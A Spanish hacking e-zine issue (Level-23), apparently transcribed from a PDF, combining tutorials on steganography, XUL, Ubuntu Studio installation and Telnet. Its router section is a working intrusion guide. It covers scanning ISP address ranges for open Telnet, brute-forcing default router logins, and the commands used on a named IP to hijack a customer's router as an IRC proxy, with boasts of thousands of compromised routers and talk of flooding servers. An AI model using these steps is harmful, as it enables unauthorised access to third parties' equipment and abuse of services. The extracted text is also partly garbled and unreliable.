Manual Phiser Rapidshare 2009

Transcripción

Manual Phiser Rapidshare 2009
Editorial
Esta Edición # 1 de la E-zine Level-23 está dirigida a todas
aquellas personas que están interesadas en aprender o
mejorar sus conocimientos en los distintos campos de la
informática como lo son la programación, la criptografía la
esteganografia, distintas técnicas de hacking y algunos
temas que podrán ver en el desarrollo de esta revista, que
solo pretende exponer estos temas de carácter educativo
en ningún momento pretende incitar a llevar acabo delitos,
cada persona es lo suficiente consciente de que es bueno y
que es malo por lo tanto deben asumir las consecuencias de
sus actos. Además de nuestros colaboradores de la revista
pretenden compartir sus conocimientos con aquellos
interesados en hacerlo.
Agradecemos a todos aquellos participantes de este
proyecto que venimos tratando de hacer desde hace meses
y que fue interrumpido ya todos sabemos las razones y pues
decidimos continuar con este proyecto y hoy estamos
contentos de poder presentarles a ustedes esta edición,
fueron muchos los días y noches de esfuerzos por todos
aquellos integrantes por eso les agradezco por su
compromiso con level-23.org.
Un agradecimiento especial a todos aquellos usuarios de
www.level-23.com
quienes
han
estado
esperando
ansiosamente esta ebook, por su paciencia y fidelidad con
el sitio.
Atentamente C4x30x - Director E-zine Level-23
CONTENIDO
* Manual Esteganograf
Esteganografíía
* Manual xul
* Intrusion a un Router Mediante Telnet
* Instalar UbuntuStudio
* Telnet y ssh
* XSS TUNELING
ón a XSS
* Introducci
Introducció
ón en HTML y CSS
* Curso Básico de Programaci
Programació
* Manual Inyeccion Sql
* Arquitectura de Computadores
* Manual Phiser Rapidshare 2009
* Manual Phiser Megaupload 2009
Esteganografíía
Esteganograf
Para comenzar debemos de saber el significado de esta técnica
La Esteganograf
Esteganografíía.- o empleo de canales subliminales proviene del griego.
steganos(secreto) y grafía (escribir). Y su definición es: “La escritura secreta”
Antes de continuar explicándoles como funciona esta técnica también debemos
de conocer la siguiente:
Criptograf
Criptografíía.- el arte de ocultar. La palabra tiene su origen en el griego. kryptos
(oculto, escondido) y graphein (escribir). Y su definición es: “Arte de escribir
con clave secreta o de un modo enigmático”
Gracias a esta ciencia o artes aprenderemos a ocultar nuestros mensajes de la
vista de otras personas. cabe señalar que mucha gente cofunde la
Esteganografíía con la Criptograf
Esteganograf
Criptografíía por su parecido en cuanto al objetivo final
pero debemos de ser capaces de distinguirlas muy fácilmente debido a que el
objetivo de la criptografía no es de ocultar el mensaje sino mas bien mediante
sus algoritmos de encriptación hacerla ilegible a las personas.
En muchas ocasiones es necesario juntar estas dos técnicas para tener un
resultado óptimo ya que si nuestro mensaje es interceptado sin la clave de
encriptación no podrán hacer nada y nuestra información permanecerá segura.
Una mención especial merece el uso de la Esteganografía para exportar
información sin violar las leyes restrictivas que, con respecto a la Criptografía
fuerte, existen en algunos países. Un ejemplo seria enviar un mensaje con texto
claro, pero entremezclado con cantidades ingentes de basura. El destinatario
empleara técnicas esteganograficas para separar la información útil del resto.
Esta técnica se conoce como chaffing and winnowing
winnowing, que vendría a traducirse
como llenar de paja y separar el grano de la paja.
Este sistema surgió en marzo de 1998, propuesto por Ronald L. Rivest uno de
los creadores de RSA, como desafió a la política restrictiva del Gobierno de los
EE.UU. con respecto a la Criptografía. No deja de ser en cierto modo una
curiosidad, debido a lo enormemente grandes que son los mensajes en
comparación con la cantidad de texto útil que se puede incluir en ellos.
Continuando con nuestra técnica supongamos que queremos enviar un mensaje
secreto a un amigo y no queremos que nadie sospeche que se le esta enviando
mas información de lo que a simple vista se observa.
En realidad existen infinidad de métodos que se encuentran limitados solo por la
imaginación de cada uno.
En este caso podríamos enviarle una imagen y dentro de la imagen colocar
nuestro mensaje, a simple vista todos observaran la imagen pero ignoraran que
dentro de ella se encuentra nuestra información secreta, ahora asumiendo que
una persona externa conociera el método empleado para camuflar nuestro
mensaje, ahí nuestra información estaría corriendo un grave riesgo y
tendríamos que utilizar la criptografía para proteger nuestra información pero
podemos utilizar la siguiente técnica chaffing and winnowing para mandar
muestro mensaje original entremezclado con la basura que hayamos llenado y
solo quien disponga de la clave estaría en condiciones de recuperar el mensaje
original
Creo que ya es suficiente teoría para entender bien la Esteganografía y su
diferencia notoria o claramente distinguida con la criptografía, ya solo nos
queda ir ahora a la practica entonces manos a la obra
Ahora lo que haré es introducir un mensaje dentro de una imagen de esa forma
todos verán la imagen y no sospecharan de la información adicional que hay,
para ello necesitare tener 3 archivos que los tendremos dentro una misma
carpeta:
Imagen.jpg : pantalla que utilizaremos para ocultar nuestra informacion
Mensaje.txt : información que vamos a ocultar “este es un ejemplo de
esteganografia”
Separador.txt
: separador para encontrar nuestro mensaje “AB--//ba”
Ahora debemos de abrir el cmd para hacer esto debemos presionar la tecla
windous + R y escribiremos cmd, ahora nos ubicamos en la carpeta que
contiene nuestros archivos y escribimos lo siguiente dentro de nuestra consola
que hemos abierto y presionamos enter
Lo que estamos haciendo es copiar de forma binaria (copy /b) nuestro mensaje
a la imagen
Ahora ejecutamos nuestro editor hexadecimal en mi caso utilizare Hex
Workshop y abrimos nuestra imagen y buscamos el contenido de nuestro
separador “AB--//ba”
Una vez encontrado nuestro texto separador vemos nuestro mensaje secreto
que en este caso es “este es un ejemplo de esteganografia”.
En este ejemplo introduje nuestro mensaje al final de los datos de la imagen
pero aun así este mensaje es muy fácil de interceptar lo ideal hubiese sido
haber introducido fragmentos de nuestro mensaje con nuestro separador y
haber introducido mas información (spam) haciendo uso de la técnica chaffing
and winnowing antes mencionada pero siempre se debe de empezar con
ejemplos básicos y simples para después seguir con los mas complejos
También se pudo usar la criptografía para hacer ilegible nuestro mensaje eso ya
es a cuenta de la imaginación y el grado de seguridad que le quieran dar.
Bueno con esto me despido y espero haberles ayudado a comprender el uso de
esta técnica y diferenciarla de la criptografía
Propiedad de www.level-23.com
Autor : Shevchenko
Manual Xul
Hola a todos soy Shevchenko y pertenezco a la comunidad level-23 este es mi
primer manual sobre XUL y también la primera entrega comenzare
respondiéndoles ¿Qué es XUL?
XUL es un lenguaje basado en XML para el desarrollo de interfaces de usuario
multiplataforma del que se dice será la pesadilla de .NET de Microsoft. Su
nombre deriva de las siglas de XML-based User-interface Language y fue
creado por la gente del proyecto Mozilla apoyándose en su motor de
renderizado, Gecko, que se encarga tanto del visualizado de webs como de la
construcción de la interfaz de usuario.
En esta entrega hablare un poco sobre la creación de archivos XUL y los
elementos básicos que podemos añadirle.
La estructura de un archivo XUL es bastante simple y fácil. Solo necesitamos un
editor de texto en Windows (Block de notas, etc.) y en Linux (Gedit, Kwrite, etc.).
Para poder visualizar nuestros archivos en XUL debemos de tener instalado un
navegador web con motor gecko yo les recomiendo que usen Firefox y creo que
no hace falta decir que IE no sirve.
No nos olvidemos que debemos de guardar el archivo con extensión “.xul”.
<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<window
id="ventana"
title="Ejemplo XUL"
orient="horizontal"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
...
</window>
Esta ventana no hace nada, ya que no contiene ningún elemento.
1. <?xml version="1.0"?>
Esta línea declara simplemente que se trata de un archivo XML.
2. <?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
Esta línea se utiliza para especificar las hojas de estilo que va a utilizar para el
archivo. Puede incorporar mas líneas haciendo referencia a su hoja de estilo
3. <window
Esta línea crea la interfaz de Xul y es similar al body de html
4. id="ventana"
El atributo id se utiliza como un identificador para que la ventana puede ser
contemplado por los scripts.
5. title="Ejemplo XUL"
El título describe el atributo de texto que aparece en la barra de título de la
ventana cuando se muestra. En este caso, el texto aparecerá "Ejemplo XUL".
6. orient="horizontal"
Especifica como estará la disposición de los elementos en la ventana.
7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
Esta línea declara el nombre para XUL, lo que se debería poner en la ventana de
elemento que indique que todos sus hijos son XUL. Mozilla va a reconocer esta
URL internamente.
8. ...
Aquí es donde los elementos (botones, menús y otros componentes de interfaz
de usuario).
9. </window>
Y, por último, tenemos que cerrar la ventana etiqueta al final del archivo.
Ahora que ya conocemos lo elemental de un archivo XUL vamos a añadirle
algunos elementos
ón Etiqueta <button>
Añadiendo un bot
botó
<button
="boton"
id="boton"
id
="dialog"
class="dialog"
class
="OK"
label="OK"
label
="image.jpg"
image="image.jpg"
image
="true"
disabled="true"
disabled
="t"
/>
accesskey="t"
accesskey
="t"/>
Los atributos son los siguientes, todos los cuales son opcionales:
Id: Un identificador único para el botón. Verá este atributo en todos los
elementos.
Class: Identificador de clase para el botón. Esto funciona igual que en HTML y lo
podemos utilizar para cambiarle atributos con hojas de estilo (CSS).
Label: El nombre que aparecerá en el botón es como el value en HTML. Por
ejemplo, Aceptar o Cancelar.
Image: La URL de la imagen para que aparezca en el botón. Los botones en si no
son muy agradables visualmente por eso existe este atributo que funciona igual
que en HTML
Disabled: Solo existen dos estados (“True” y “False”), trae el botón esta
habilitado y false desactivado o deshabilitado
Accesskey: Tecla de acceso rápido se presiona ALT + la letra subrayada. En el
ejemplo se coloco la letra t y como esta letra no esta en el label (etiqueta) del
botón aparece entre paréntesis la letra que pusimos. Ahora colocando la letra
“o” y el botón habilitado se visualiza asi:
Añadiendo texto Etiqueta <label>
La forma más básica para incluir texto en una ventana es utilizar la etiqueta
label.
<label value="Bienvenidos a Level-23"/>
Ejemplo sin value
<label>Bienvenidos a Level-23</label>
La etiqueta label también posee el atributo class para poder editarlo mediante
CSS y mejorar su estilo.
ágenes Etiqueta <Image>
Añadiendo im
imá
Al igual que HTML, XUL tiene un elemento para mostrar imágenes dentro de una
ventana. Puede utilizar el atributo src para especificar la URL del archivo de
imagen. El ejemplo siguiente muestra esto:
<image src="banner.jpg"/>
Su funcionamiento es igual que <img> en HTML
Añadiendo cuadro de texto Etiqueta <textbox>
HTML tiene un elemento de entrada que pueden ser utilizados para los controles
de entrada de texto. XUL tiene un elemento similar, de texto, utilizadas para el
mismo proposito. Sin ningún atributo, el elemento de texto crea un cuadro en el
que el usuario puede introducir texto. Esta etiqueta tambien posee los mismos
atributos como los controles de entrada HTML. Las siguientes son algunas de
ellas:
Type: Esto normalmente se usa para introducir contraseñas.
Maxlength: El número máximo de caracteres que permite el cuadro de texto.
Maxlength
<textbox id="txtIngreso" width="250px" height="25px"> </textbox>
Ahora veamos un ejemplo con lo que hemos aprendido hasta ahora
<box>
<vbox>
<hbox>
<label value="Ingrese Texto" flex="1"/>
<textbox id="texto-ingresado"/>
</hbox>
<hbox>
<label value="Ingrese Password" flex="1"/>
<textbox id="pass-ingresado" type="password" maxlength="8"/>
</hbox>
</vbox>
</box>
Desde ahora dejo un poco el discurso y empezamos más con los ejemplos que
es la mejor forma de aprender
<textbox multiline="true"
value="En esta caja de texto se podra escribir varias lineas."/>
Checkbox y Radio Buttons Etiqueta <checkbox> y Etiqueta <radiogroup>
Dos elementos adicionales que se utilizan para la creación de casillas de
verificación y botones de selección. Se utiliza para las opciones que puede ser
activado o desactivado.
El ejemplo siguiente muestra algunas sencillas casillas de verificación y botones
de radio.
<checkbox id="chkbox1" checked="true" label="Seleccionado"/>
<checkbox id="chkbox2" checked="false" label="No seleccionado"/>
<radiogroup>
<radio id="Rojo" label="Rojo"/>
<radio id="Verde" selected="true" label=" Verde "/>
<radio id="Azul" label=" Azul "/>
</radiogroup>
List Controls Etiqueta <listbox>
Un cuadro de lista se utiliza para mostrar una serie de elementos. El usuario
puede seleccionar un elemento de la lista.
XUL proporciona dos tipos de elementos para crear listas, una lista para crear
múltiples hileras, y un elemento menulist para crear la lista desplegable cajas.
Ellos funcionan de manera similar al HTML, pero los elementos XUL tienen
características adicionales.
Por ejemplo, este cuadro de lista tendrá cuatro filas, una para cada tema.
<listbox>
<listitem label="Opera"/>
<listitem label="Firefox"/>
<listitem label="Chrome"/>
<listitem label="IE"/>
</listbox>
Multi-Column List Boxes
La lista también soporta múltiples columnas. Cada celda puede tener contenido
dentro de ella.
Dos etiquetas se utilizan para especificar las columnas en la lista. El elemento
listcols se utiliza para la columna de información, cada una de las cuales se
especifica mediante un elemento listcol. Usted necesitará un elemento listcol
para cada columna en la lista.
El listcell elemento puede ser utilizado para cada celda en una fila. Si desea
tener tres columnas, usted tendrá que agregar tres elementos listcell dentro de
cada ListItem. Para especificar el contenido de texto de una celda, coloque una
etiqueta en un atributo listcell. Por el simple caso de que sólo hay una columna,
también puede colocar la etiqueta de atributos directamente en el elemento
ListItem y dejar el listcell a cabo por completo, como se vio en la anterior lista de
ejemplos.
El ejemplo siguiente es de una lista con dos columnas y tres filas:
<listbox>
<listcols>
<listcol/>
<listcol/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="22 años"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="23 años"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="21 años"/>
</listitem>
</listbox>
Header Rows
También permiten una línea de encabezamiento. Esto es mucho como una línea
regular, salvo que se muestra diferente. Usted podría utilizar esto para crear
cabeceras de columna. Dos nuevos elementos que se utilizan.
El elemento listheader se utiliza para cada celda en la fila de títulos.
Aquí está el ejemplo anterior con una línea de encabezamiento:
<listbox>
<listhead>
<listheader label="Nombre"/>
<listheader label="Ocupación"/>
</listhead>
<listcols>
<listcol/>
<listcol flex="1"/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="Mi novia"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="Estudiante"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="Sistemas"/>
</listitem>
</listbox>
Comenzamos ahora con la practica realizando una calculadora, pero xul solo
sirve para hacer el interface (pantallazo) por eso usaremos javascript para
realizar las operaciones.
Copien el código en un block de notas y guárdenlo pero no se olviden que debe
de tener extensión .xul
Calculadora.xul
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="chrome://global/skin" type="text/css"?>
<?xml-stylesheet href="estilo.css" type="text/css"?>
<window id="calculadora"
title="Calculadora"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="funcion.js"/>
<box flex="1" id="fondo" pack="center" style="overflow:auto;">
<hbox>
<vbox pack="center">
<groupbox>
<groupbox align="center" pack="center" >
<separator style="height:5px"/>
<label value=" CALCULADORA " style="font-family:Arial; -moz-borderradius:8px;font-weight:bold;background-color:#000000;color:#DB974D;fontsize:12px;padding:6px;border-top: 5px solid #BFBFBF; border-left: 5px solid
#BFBFBF; border-bottom: 5px solid #BFBFBF;border-right: 5px solid
#BFBFBF;"/>
<separator style="height:5px"/>
</groupbox>
<groupbox align="right">
<hbox>
<label id='texto' flex='1' value='0' align="right" style='fontsize:24px;color:#fff;font-weight:bold;'/>
</hbox>
</groupbox>
<groupbox>
<hbox>
<vbox align='center'>
<label id='memoria' value='' style='height:26px;color:#fff;font-weight:bold;'/>
<button id='texto' label='MC' style='width:50px;color:#f00'
oncommand="delMemoria()"/>
<button id='texto' label='MR' style='width:50px;color:#f00'
oncommand="impMemoria()"/>
<button id='texto' label='MS' style='width:50px;color:#f00'
oncommand="guardaMem()"/>
<button id='texto' label='M+' style='width:50px;color:#f00'
oncommand="guardaMem()"/>
</vbox>
<vbox>
<hbox>
<button id='retro' label='Retroceso' flex='1' style='color:#f00'
oncommand="retro()"/>
<button id='limpiar' label='CE' flex='1' style='color:#f00'
oncommand="limpiarTodo()"/>
<button id='limpia' label='C' flex='1' style='color:#f00' oncommand="limpiar()"/>
</hbox>
<hbox>
<button id='7' label='7' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='8' label='8' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='9' label='9' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='div' label='/' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='raiz' label='sqrt' style='width:30px;color:#00f'
oncommand="raiz(this.label)"/>
</hbox>
<hbox>
<button id='4' label='4' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='5' label='5' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='6' label='6' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='mul' label='*' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='por' label='%' style='width:30px;color:#00f'
oncommand="porcentaje()"/>
</hbox>
<hbox>
<button id='1' label='1' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='2' label='2' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='3' label='3' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='men' label='-' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='ter' label='1/x' style='width:30px;color:#00f'
oncommand="fraccion()"/>
</hbox>
<hbox>
<button id='0' label='0' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='signo' label='+/-' style='width:30px;color:#00f'
oncommand="cambiaSigno(this.label)"/>
<button id='punto' label='.' style='width:30px;color:#00f'
oncommand="impPunto(this.label)"/>
<button id='mas' label='+' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='igual' label='=' style='width:30px;color:#f00' oncommand="igual()"/>
</hbox>
</vbox>
</hbox>
</groupbox>
</groupbox>
</vbox>
</hbox>
</box>
</window>
Solo explicare las nuevas etiquetas utilizadas y atributos importantes.
Recuerden que Xul esta basado en XML y si se abre una etiqueta debes de
cerrarla, existen 2 formas de cerrar una etiqueta abierta:
Forma corta
<etiqueta />
Forma larga
<etiqueta> <etiqueta/>
Xul también permite utilizar las hojas de estilo (CSS) y para usarlas debemos de
incorporar la siguiente línea de código donde href ira la ruta de nuestra hoja de
estilo
<?xml-stylesheet href="estilo.css" type="text/css"?>
Como dije antes xul solo es la pantalla que visualizamos y si queremos realizar
algún proyecto debemos de utilizar javascript
<script src="funcion.js"/>
En xul también existen los contenedores con lo que podemos ordenar los
botones de manera horizontal (hbox) y vertical (vbox)
Es el contenedor principal su uso es opcional
<box flex="1" id="fondo" pack="center" style="overflow:auto;">
<hbox> todos los elementos que coloquemos dentro de esta etiqueta se
ordenaran en forma horizontal </hbox>
<vbox pack="center"> en este caso se ordenaran en forma vertical y por el
atributo colocado estará de forma centrada a la ventana </vbox>
<groupbox> este contenedor muestra un contorno donde podemos ver que
elementos tiene agrupado y también nos permite asignarle un titulo visible
</groupbox>
Para usar una función de javascript en xul haremos uso de la etiqueta button y
de sus eventos: oncommand, onclick, etc.
<button id='mas' oncommand="opera(this.label)"/>
Para
referenciar
un
objeto
de
xul
en
javascript
usamos
'Id-xul')
document.getElementById donde hacemos referencia por su ID ('Id-xul')
seguido de la propiedad del mismo que puede ser: label, value, hidden, etc.,
ejemplo:
document.getElementById('Id-xul').value
Les voy a dejar todo el ejemplo para que lo puedan descargar y probar
P.D.: No se por que siempre que alguien te enseña un nuevo lenguaje siempre
acabas realizando una calculadora XD
En nuestra segunda parte profundizaremos más sobre el uso de los elementos,
además crearemos una conexión con PHP
Espero que esta primera entrega haya despertado en ustedes vuestra
curiosidad e interés de aprender XUL
Si te interesa conocer mas sobre XUL puede visitar www.xulplanet.com o ser
parte de nuestra comunidad www.level-23.com registrándote a nuestro foro.
Propiedad de www.level-23.com
Autor : Shevchenko
Intrusión a un router mediante telnet
Intrusió
Índice
ón
1. Introducci
Introducció
2. Lo que necesitaremos
3. Un poco de teor
teoríía
4. Un Ejemplo Practico Real
ÒN
1. INTRODUCCI
INTRODUCCIÒ
telef
ónica
Hace ya unos años en la compañía “telef
telefó
nica” tuvieron la brillante idea de dejar el
puerto 23 abierto en los routers que regalaban cuando contratabas sus servicios de
Internet para así si les surgía algún problema con la configuración de ese router no
tener que desplazarse para repararlo y poder hacerlo conectándose al router mediante
telnet, teniendo en cuenta esto y que muchos de los usuarios de esos routers bien por
desconocimiento o por simple dejadez no cambian el usuario y contraseña que el
telef
ónica
router trae por defecto, con esto nos encontramos que lo mismo que los de “telef
telefó
nica”
pueden entrar a esos routers nosotros también ; )
2. LO QUE NECESITAMOS
Necesitaremos saber las ip´s vulnerables, que tipo de router utilizan y el usuario y la
contraseña para poder conseguir entrar en ellos.
Lo primero es escanear rangos de ip´s de esta compañía buscando las que
tengan el puerto 23 abierto, esto lo podemos hacer con el programa ipscan
descargar desde aquí http://www.megaupload.com/es/?d=OFR8N450 , Lo
segundo es saber que tipo de routers colocaban por aquellas fechas (eso ya os
lo digo yo, se llamaban 3com
3com). En tercer lugar necesitaremos saber cuales son
los usuarios y contraseñas que utilizan esos routers por defecto, podéis ver
algunas desde este sitio web: http://www.newbie.cl/nb/2008/08/11/contrasenapor-defecto/ Y por ultimo necesitaremos un programa que sea ágil probando en
esas ip´s los usuarios y contraseñas para saber en cuales
podemos entrar, existen varios programas de brute force con los que podéis hacer esto,
el brutus seria una buena elección, descárgalo desde aquí
http://www.megaupload.com/es/?d=4GTZNN1Z . Creo que con todo esto no tengáis
problema para conseguir una buena lista de ip´s con sus user y pass (os puedo decir
que yo tengo miles que a día de hoy funcionan)
3. UN POCO DE TEORIA
Una vez tengamos alguna ip con su respectivo usuario y contraseña es cuestión
de ir a inicio/ejecutar y ponemos telnet ip ejemplo: telner 125.125.125.00 y le
damos a aceptar, con esto se nos abrirá la consola y lo primero nos pedirá el
usuario, lo ponemos y pulsamos enter, después nos medirá la contraseña, la
escribimos (ojo que no se vera lo que estamos poniendo) pero lo escribimos de
todas formas y le damos a enter, si todo salio bien nos dará la bienvenida y ya
estaremos dentro del router si tecleamos el comando help nos listara los
comandos disponibles, podemos seguir navegando dentro de las opciones del
router através del comando help ejemplo: help ADD que
es el primer comando que aparece en la lista.
Apartir de aquí es cosa de cada uno la intención que tenga de lo que quiere hacer
dentro.
4. UN EJEMPLO PRACTICO REAL
Bueno, vamos a intentar mapear un puerto dentro de este router para redirigirlo a un
servidor de IRC y así ocultar nuestra ip conectándonos através de el.
Primero abrimos una conexión de Telnet en la consola con la ip, en este caso con
80.32.109.73 y nos logueamos (todo esto como vimos en el punto 3) una vez hecho esto
intentaremos redirigirle el puerto 5555 en dirección al servidor de IRC para ello
utilizaremos los siguientes comandos. (Lo resaltado en gris son los comandos a
introducir)
Mandamos un comando de preaviso al router de lo que queremos hacer:
enable ip wan_to_wan_forwarding
Después mandamos el comando con los datos de lo que queremos:
add nat tcp vc internet public_port 5555 private_port 6667 private_address 149.9.1.16
Si nos fijamos en el comando anterior el 5555 es el puerto que vamos a abrir en el
router y 149.9.1.16 6667 son la ip y puerto a donde queremos que señale (esta
dirección y puerto apuntan a dalnet).
Una vez introducido el comando anterior
tecleamos lo siguiente:
nos pedirá que salvemos los cambios,
save all
Y para que surjan efecto los cambios debemos rebotear el router:
reboot
Nos pedirá confirmación para esto:
Yes
Esperamos unos segundos, salimos de la consola y ya tenemos el puerto 5555 de este
router apuntando a un servidor de IRC.
Vista de lo hecho asta ahora:
Con esto abrimos nuestro MIRC y ponemos:
/server 80.32.109.73 5555
Y nos conectaremos al servidor de IRC.
Bueno pues ya tenemos todo hecho nos hemos fabricado un Proxy para conectarnos al
IRC con una ip distinta a la nuestra y así poder permanecer en el anonimato, muestro
una captura:
En la imagen vemos como el nick de arriba aparece con mi ip real, en cambio el nick de
abajo también soy yo pero conectándome através del router al que terminamos de
mapear el puerto, y os preguntareis tanto trabajo
para tan solo ocultar nuestra ip en el IRC, pues os explico, en la mayoría de se
servidores de IRC no se permite la entrada de mas de dos o tres nicks por ip, con lo
cual mediante este proceso podemos saltarnos esta norma, imaginen que metemos 100,
no 1000, saben lo que se podría hacer con tal numero de conexiones, se podría tumbar
el servidor entero.
Yo personalmente me programe en mircscripting un clonador con el cual conseguía
meter más de mil de estas ip´s en el IRC, una capturita:
Esto es solo una de las utilidades que se les puede dar a estos routers, pero quien sabe,
se podría intentar conectarlos a una web o quizás se podría sacar algún beneficio con
ellos, nunca me pare a pensarlo….
Autor : Stop
Instalar UbuntuStudio
En este manual les mostraremos como instalar UbuntuStudio en Ubuntu desde
los repositorios sin afectar a Windows.
Para este manual no necesitamos tener los conocimientos de particiones de
disco duro, también sirve para todos esas personas que no tengan unidad de
DVD en su computadora.
¿Cual Ubuntu es correcto para nuestra computadora?
AMD Athlon 1000+ 512 Gbyte de memoria RAM Tarjeta de vídeo nVidia
GeForce2 400 MX AGP con 64 MBytes Monitor TFT de 17″ HP pavilion vs17 Placa
base Gygabyte GA-7IXEH con chipset VIA KT133 Discos duros: 1 de 40 GBytes
Seagate ATA, 1 de 13 GBytes Seagate ATA Regrabadora CD Plextor Tarjeta de
Sonido: Creative Soundblaster Live! PCI Teclado Logitech Cordless Keyboard
Adaptador Wifi ZyDAS 802.11 b/g USB (proporcionado por Jazztel)
AMD Athlon 64 3000+ 1 Gbyte de memoria RAM Tarjeta de vídeo nVidia GeForce
7600 GS (G70) PCI-Express con 512 MBytes Monitor TFT de 17″ HP pavilion
f1723 Placa base Gygabyte GA-K8N Ultra-9 con chipset nVidia nForce4 Discos
duros: 1 de 120 GBytes Seagate SATA, 1 de 250 GBytes Seagate SATA
Regrabadora DVD Nec Tarjeta de Sonido: Creative Soundblaster 128 PCI
Webcam USB Logitech QuickCam Connect Teclado Logitech Cordless
Keyboard S510 Impresora HP 930C USB
Instalando Ubuntu en Windows.
luego que pongamos el CD en la computadora nos saldrá una ventana como
esta:
Le daremos a Run umenu.exe y luego nos saldrá una ventana como esta:
Para los que no sepan ingles les voy a traducir las 3 opciones que se muestran
para que así puedan tener una idea.
¡Prueba Ubuntu sin instalarlo! simplemente reinicie el su computadora con el CD
dentro de la unidad. Puede realizar una instalación completa desde la
demostración para instalar Ubuntu junto con Windows, o bien como su único
sistema operativo instalado en su computadora.
Instala y desinstala Ubuntu como si fuera otra aplicación, sin necesidad de una
partición dedicada. al arrancar el equipo, podrá iniciar Windows o Ubuntu,En
este modo, la hibernación no está habilitada y el rendimiento del disco se
reduce ligeramente.
Ubuntu es un sistema completamente libre basado en Linux y desarrollado por
la comunidad, que dispone de un navegador de web, sofware de productividad,
mensajería instantánea y mucho más.
Ahora que ya sabemos lo que son las tres opciones le vamos a dar a install
inside windows luego que le demos a la opción pasaremos a la siguiente
ventana:
ón: aquí escogeremos en que unidad de disco duro
Unidad para la instalaci
instalació
queremos que se instale eso sí, si tienes 2 disco duro si no pues normalmente es
el C: no se preocupen esto no dañara nada de su Windows solo que tiene que
estar pendiente al espacio libre en su disco duro.
ón: Bueno ahí escogeremos la cantidad de espacio que
Tamaño de la instalaci
Tamañ
instalació
queremos que tenga nuestro Ubuntu lo mínimo son 4 pero escojan mas así
tendrán mas espacios para instalar las aplicaciones que quieran.
Entorno de escritorio: por el momento en el CD sólo podemos elegir el entorno
grafico (GNOME).
Idioma: Mmmm escoge el idioma de tu preferencia.
Usuario: Por defecto nos vendrá el mismo usuario que tienes en Windows, pero
tranquilo puedes cambiarlo. El usuario es el nombre con el que iniciaras sesión
en Ubuntu.
Contraseña: Pondremos la contraseña que usaremos para iniciar sesión y
Contraseñ
usaremos como root.
Luego que haigamos terminado de llenar los datos le damos a instalar. Luego
nos saldrá la próxima ventana.
Aún el sistema no se está instalando. Lo que está haciendo es preparar unos
“archivos temporales” de instalación para la segunda fase, que será la que sí
haga la instalación como tal.
ahora cuando termine le damos a Reiniciar ahora.
luego que la computadora reinicie nos saldrá una ventana como esta:
Nos da 2 opciones para escoges sale Windows y Ubuntu en este caso
escogemos Ubuntu.
Ahora nos mostrará otro menú de selección, en esta ocasión vamos a escojer
“menu.lst“. Elegimos la primera opción que vemos en la imagen y le damos
ENTER.
Ahora Ubuntu estara iniciandose.
después que termine de llenarse la barra naranja nos saldrá una venta con el
progreso de la instalación en este caso no tendremos que hacer Nada solo
esperar que termine y listo.
Ahora solo reiniciamos la computadora y nos saldrá de nuevo la ventana para
escoger que sistema operativo usar también ahora escogeremos Ubuntu.
Ahora Ubuntu nos subirá ya normal que que hemos instalado el sistema
operativo con existo
Nos logeamos y estaremos en el desktop.
Instalando UbuntuStudio desde los repositorios en Ubuntu.
Bueno ya adentro de Ubuntu vamos a:Sistema => administración => gestor de
paquetes synaptic
Nos
saldrá una venta en ella pondremos el password que pusimos para logearnos
para entrar en Ubuntu.
Luego nos pasaremos a la siguiente ventana.
Ahora vamos a buscar en la lista ubuntustudio-desktop le damos clic derecho y
escogemos la opción marcar para instalar.
Aparece un cuadro de dialogo donde nos avisa que componentes se van ah
instalar le damos marcar.
Luego le damos a Marcar
luego aquí bien la parte opcional ya que todo depende de nuestras necesidades
instalando el tipo de paquetes que necesitemos ya sea para producción de
audio, vídeo o de imágenes.
para instalar la paquetería de edición de vídeo marcamos (de la misma forma
que marcamos ubuntustudio-desktop), ubuntustudio-video.
Para instalar la paquetería de edición de imágenes marcamos, ubuntustudiographics
y para instalar la paquetería de edición de audio marcamos, ubuntustudio-audio
y ubuntustudio-audio-plugins.
Lo que esta de color verde es lo que hemos escojido para instalar en nuestro
Ubuntu. Vuelve a salir el cuadro de dialogo avisándonos lo que se va a instalar, y
de nuevo de le damos clic en marcar.
Luego nos saldrá otra ventana como esta:
y nuevamente le damos a Aplicar.
Luego se estaran descargando los paquetes.
Luego que se descargen se estarán instalando en nuestra computadora.
luego que termine solo resta reiniciar la computadora y volver a entrar y ya
tendremos nuestro UbuntuStudio instalado.
Bueno eso ha sido todo por hoy si tienes una duda o te gustaría ver manuales asi
puedes pasarte por nuestra web http://level-23.com/ con mucho gusto te
resiviremos
Autor: UnknownShadow
Telnet y ssh
Telnet es el génesis cuanto a conexiones se refriere, en la antigüedad cuando
no había exploradores funcionales como FireFox, Opera etc, o no tan
funcionales como IE, los habitantes del Cyber-mundo tenían que conformarse
con una simple consola y un protocolo antiguo pero poderoso para conectarse a
la telaraña mundial llamado Telnet…
ón a Telnet:
Breve introducci
introducció
El Tel
Telecommunication Net
